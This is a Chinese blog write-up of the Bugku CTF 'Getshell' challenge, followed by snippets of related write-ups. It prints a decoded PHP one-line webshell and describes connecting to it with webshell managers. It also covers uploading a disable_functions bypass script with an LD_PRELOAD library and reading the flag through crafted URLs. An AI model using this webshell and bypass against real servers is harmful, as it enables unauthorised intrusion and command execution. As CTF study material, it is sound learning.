【Bugku-Getshell-wp】

最新推荐文章于 2024-05-27 21:07:34 发布
最新推荐文章于 2024-05-27 21:07:34 发布
阅读量330 收藏
点赞数 1
分类专栏: ctf 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46202048/article/details/127522548
版权

Getshell

  • 启动场景,按照大佬的提示打印变量

在这里插入图片描述

打印这个变量看看echo $BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC是什么

  • 发现是base64_decode,然后把后面那一大段base64解码,解码之后如下
    在这里插入图片描述

  • 这里有许多变量,全部打印出来,打印出来又得到类似第一步的代码,就又如法炮制,解到最后
    在这里插入图片描述

发现这一段很乱的代码的本质就是一个一句话木马

<?php
highlight_file(njVysBZvxrLkFYdNofcgGuawDJblpOSQEHRUmKiAhzICetPMqXWT);
@eval($_POST[ymlisisisiook]);

我使用菜刀连接上如下
在这里插入图片描述

红圈圈的是我们后面上传提权的文件,最开始发现全站里面只有一个主页index.php,权限不够,这里使用bypass_disablefunc提权
在这里插入图片描述

我们在bypass_disablefunc.php加上error_log(“a”,1);
在这里插入图片描述

菜刀上传文件
在这里插入图片描述
在这里插入图片描述

这里用蚁剑连接,但是看不了根目录的东西,很明显被disable_function,也就是禁用函数了
一般来说,蚁剑有个插件可以直接绕过的,但是这里用不了,原因大概是这个插件的底层原理是用mail()函数
但是我们看mail已经被禁用了
在这里插入图片描述

最后cmd处输入我们的执行命令

http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so
http://123.123.123.123/bypass_disablefunc.php?cmd=cat%20/flag&outpath=/tmp/xx&sopath=/var/www/html/bypass_disablefunc_x64.so

得到flag、
在这里插入图片描述

flag{7f0b695b2b64ab514495765eb6592104}

do you best
关注
专栏目录
BUGKU WP-getshell
m0_55631425的博客
06-20 596
蚁剑连接 linux主机,putenv=on,用LD_PRELOAD方法绕过 注意windows无法使用该插件,建议上虚拟机 附赠蚁剑插件市场打不开的解决办法: http://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247484036&idx=1&sn=9ee9156e63b8f17c147fc0c05be69027&chksm=e91c597cde6bd06a7abdec4ad9cf3d275530af3bdc069..
bugku-pwn-wp
令则
03-27 466
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
wp-bugku-web-getshell
bin789456的博客
08-24 543
写在前面 本题主要知识点:含php混淆加密,webshell进阶绕过。 wp 打开题,非常乱的代码,隐约看得出是php代码,确定是php加密: 如果你想学习,什么是混淆加密或者为什么需要混淆加密,可以查看: 混淆加密详解 解密方法如下: 1.调试解密 2.在线解密:https://www.zhaoyuanma.com/phpjm.html 在线解密结果如下: 显然我们可以蚁剑连接了 连接后但只能访问当前目录 提示错误,权限不足,在终端中使用命令,也没啥反应。 很有可能是disable_function
bugku————求getshell
clood的博客
03-23 248
ps
bugku 求getshell
Superpig的博客
11-15 2113
分析 1、getshell就是获得权限的意思,但是本题考点在上传文件绕过 2、判断第一个绕过点在请求头中的content-type上,因此通过大小写进行绕过(multipart/form-data 是上传文件时使用的格式) 3、第二个绕过点在 上传文件的后缀名上 解题 用burpsuite抓包后,更改content-type,再更改文件后缀名逐一判断哪种后缀可以绕过 新姿势 上传文件绕过 ...
bugKu getshell
YenKoc的博客
12-05 1035
题目说上传一个图片,而不是php文件,但是我们就是要上传一句话木马,任性。 前面没有直接报错,说明不是由前端验证,用我们的抓包神器bp抓下包。 上图被我修改过三个地方了, 1.filename的后缀名改成php5,其他php2, php3, php4, php5,phps, pht, phtm, phtml都尝试了,发现只有php5没被过滤 2.字母部分改成大写,这里我也不懂,希望懂的老哥...
BUGKU-WEB
wojiushilsy的博客
02-22 535
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
bugku 里面的五个pwn题wp
qq_36495104的博客
05-08 2241
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
bugku---求getshell
LuckySec
11-29 3047
题目 http://123.206.87.240:8002/web9/ 该题是walf严格匹配,通过修改Content-type后字母的大小写可以绕过检测, 然后还有,后缀黑名单检测和类型检测,逐个绕过,如图示。 得到flag ...
BugKu_getshell
Kobalos的博客
09-07 2488
访问目标地址 看到是php的代码,格式应该是经过混淆加密的 推荐一个节省时间的网站: https://www.zhaoyuanma.com/phpjm.html 解出来发现是一个木马,试着用蚁剑连接一下,成功! 但是执行命令的时候显示red=127,猜测应该是有disable_functions对执行命令的函数进行限制,查看phpinfo确认一下 果然禁止的差不多了,试着用蚁剑插件市场下载的绕过工具进行绕过! 看到插件中显示的绕过需要的条件都满足了,直接点击开始,他会在当前目录下传文件 使用蚁.
bugku web-getshell
weixin_46578840的博客
09-06 358
打开网址,发现被混淆了 这,百度了很久,终于找到一篇关于解码混淆的文章 https://www.52pojie.cn/thread-1074918-1-1.html 搞了很久解出来得到 <?php highlight_file(__FILE__); @eval($_POST[ymlisisisiook]); ?> 用蚁剑链接 发现只能再html目录下晃悠,写个phpinfo查看一下环境信息 发现很多函数被禁用了,不过没有禁putenv,参考蚁剑插件之绕disable_functions 下载好
Bugku:web 求getshell
qq_26961571的博客
09-09 1057
打开这道题,getshell表示的是get shellshell则为脚本的意思。 ​ 打开链接。 发现是一个网页可以上传文件,那么就是文件上传漏洞。 源代码也是不出所料的没有任何东西。 看来是真的要上传一个文件了,试了一下上传一个jpg格式文件,成功!!不过没有用啊,什么东西都没有显示出来。 查了一下资料: webshell就是以php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或...
bugku】-getshell-蚁剑插件的下载
weixin_52116519的博客
04-04 5051
大致步骤看这篇文章,操作细节往下看 1 打开代理设置,否则很慢 2 代理设置 3 插件市场 4 下载插件 5 加载插件 6 记得刷新 7 蚁剑连接http://114.67.175.224:15197/.antproxy.php 8 找flag
bugku-求getshell
苟有恒,必有三更眠,五更起。
07-01 744
原题链接 http://120.24.86.145:8002/web9/ 分析 上传题: 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 这里是黑名单过滤来判断文件后缀,依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写) 最终发现,php5可以绕过 接下来,请求数据的C...
Bugku web——求getshell
qq_40481505的博客
09-25 406
打开连接,是一个文件上传页面,结合题目名称,应该是需要上传shell 写一个简单shell,上传并抓包 需要更改下面三点来绕过: 将后缀改为.php5,因为phpphp2,php3,php4,php5,phps,pht,phtm,phtml都被过滤 将Content-Type: application/octet-stream改为Content-Type: image/jpeg,躲避文件识...
bugku学习之36.getshell(文件上传漏洞+一句话木马)重要!
s11show_163的博客
03-01 941
速去回顾之前写的四种文件上传漏洞的利用: https://blog.csdn.net/s11show_163/article/details/104548642 本题考察文件上传漏洞加一句话木马(内含三个绕过,十分重要) 首先写一个一句话木马 开启代理,打开burpsuit ,上传.php文件 抓包 (可能需要多抓几次哦~ 因为有时候可能抓不到呢~ ) 一共三个过滤 请求头部的 Con...
Bugku---web---shell
最新发布
weixin_47450099的博客
05-27 720
system函数,whoami命令的使用,可以直接查看当前登录系统的用户名等
Ubuntu系统中apt-get命令详解
"apt-get命令的使用" 在Linux操作系统中,特别是基于Debian和Ubuntu的发行版,`apt-get`是一个非常重要的包管理器,它允许用户便捷地安装、升级、卸载和管理软件包。本文档详细介绍了`apt-get`命令的使用方法。 1....
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值